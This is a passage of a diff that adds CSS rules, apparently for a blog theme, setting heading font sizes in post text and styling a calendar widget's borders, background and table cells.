+	font-weight:normal;
+}
+
+#content .post .entry-text h1 {
+	font-size: 28px;
+}
+#content .post .entry-text h2 {
+	font-size: 26px;
+}
+#content .post .entry-text h3 {
+	font-size: 24px;
+}
+#content .post .entry-text h4 {
+	font-size: 22px;
+}
+#content .post .entry-text h5 {
+	font-size: 20px;
+}
+#content .post .entry-text h6 {
+	font-size: 18px;
+}
+
+
+
+/* CALENDAR
+*******************************************************/
+#calendar #calendar_wrap {
+	border:solid #DDD;
+	border-width:1px;
+	background:#FFF;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+#calendar table {
+	width:100%;
+}
+#calendar table caption {
+	border:solid #DDD;
+	border-width:0px 0px 1px 0;
+	padding:5px 0;
+}
+
+#calendar table td {
+	border:solid #DDD;
+	border-width:0px 0px 0 0;
+	text-align:center;
+	background:#EFEFEF;
+}
+#calendar table td a {
+	background:none!important;
+	padding:0!important;
+	border:none!important;
+}